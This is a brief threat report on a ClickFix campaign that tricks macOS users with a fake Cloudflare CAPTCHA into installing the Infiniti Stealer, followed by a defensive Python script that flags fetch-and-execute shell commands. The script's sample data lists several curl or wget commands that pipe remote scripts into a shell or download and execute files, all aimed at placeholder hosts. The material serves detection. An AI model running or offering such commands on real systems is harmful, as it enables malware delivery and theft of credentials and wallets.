A recent ClickFix campaign targets macOS users by delivering a Python-based information stealer, known as Infiniti Stealer, through a deceptive Cloudflare-themed verification page. The attack begins with a fake CAPTCHA that prompts users to run a command in Terminal. When run, the command fetches a Bash script from a remote server, and that script downloads and executes the malware.
Infiniti Stealer collects sensitive information such as browser credentials, cryptocurrency wallets, and screenshots, and sends the data to a command-and-control server via HTTP POST requests. The malware uses evasion techniques, including randomized execution delays and checks for analysis environments. This adaptation of previously successful Windows attack methods highlights a growing threat to macOS users.
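A defensive triage sketch for the delivery step described above, where a pasted Terminal command fetches and runs a remote Bash script. This is an added example, not code from the campaign or the original report. The page does not show the actual command, so the patterns cover common fetch-and-execute shell forms in general; the rule names, the `triage` function, the host allowlist and every sample command line and host are constructed assumptions.

```python
import re

SHELL = r"\b(?:ba|z|da)?sh\b"
FETCH = r"\b(?:curl|wget)\b[^|;&]*https?://\S+"
RULES = {
    # curl ... URL | bash
    "fetch_piped_to_shell": re.compile(FETCH + r"[^|;&]*\|\s*(?:sudo\s+)?" + SHELL),
    # bash -c "$(curl ... URL)"  /  zsh <(curl ... URL)  /  sh -c "`curl ... URL`"
    "fetch_in_substitution": re.compile(SHELL + r"[^|;&]*(?:\$\(|<\(|`)\s*" + FETCH),
    # curl -o FILE URL && chmod +x FILE  /  curl -o FILE URL; bash FILE
    "fetch_then_execute": re.compile(
        FETCH + r".*(?:&&|;)\s*(?:chmod\s+\+x\b|(?:sudo\s+)?" + SHELL + r"\s+\S)"),
}
URL_HOST = re.compile(r"https?://([^/\s]+)")

# Constructed sample input: command lines as they might appear in interactive
# shell history or process telemetry. Hosts are placeholders, not indicators.
SAMPLE_COMMANDS = [
    "curl -fsSL https://verify.example.invalid/check.sh | bash",
    '/bin/bash -c "$(curl -fsSL https://tools.corp.example/bootstrap.sh)"',
    "curl -s -o /tmp/u https://dl.example.invalid/u && chmod +x /tmp/u && /tmp/u",
    "curl -fsSL https://mirror.example.invalid/src.tgz | tar xz",
    "zsh <(curl -s https://verify.example.invalid/v)",
]


def triage(commands, allowed_hosts=frozenset()):
    """Return (rule, host, command) for each fetch-and-execute command line.

    Legitimate installers use the same shell forms, so hosts listed in
    allowed_hosts (an assumed, locally maintained set) are not reported.
    """
    hits = []
    for cmd in commands:
        for rule, rx in RULES.items():
            if rx.search(cmd):
                host = URL_HOST.search(cmd).group(1).lower()
                if host not in allowed_hosts:
                    hits.append((rule, host, cmd))
                break  # one finding per command line is enough for triage
    return hits


if __name__ == "__main__":
    for rule, host, cmd in triage(SAMPLE_COMMANDS, {"tools.corp.example"}):
        print(f"{rule:22} {host:24} {cmd}")
```

A hit means a shell ran content fetched in the same command, which is also how many legitimate installers work, so the allowlist and the surrounding context (browser activity just before the command, first-seen host) decide whether it is worth escalating.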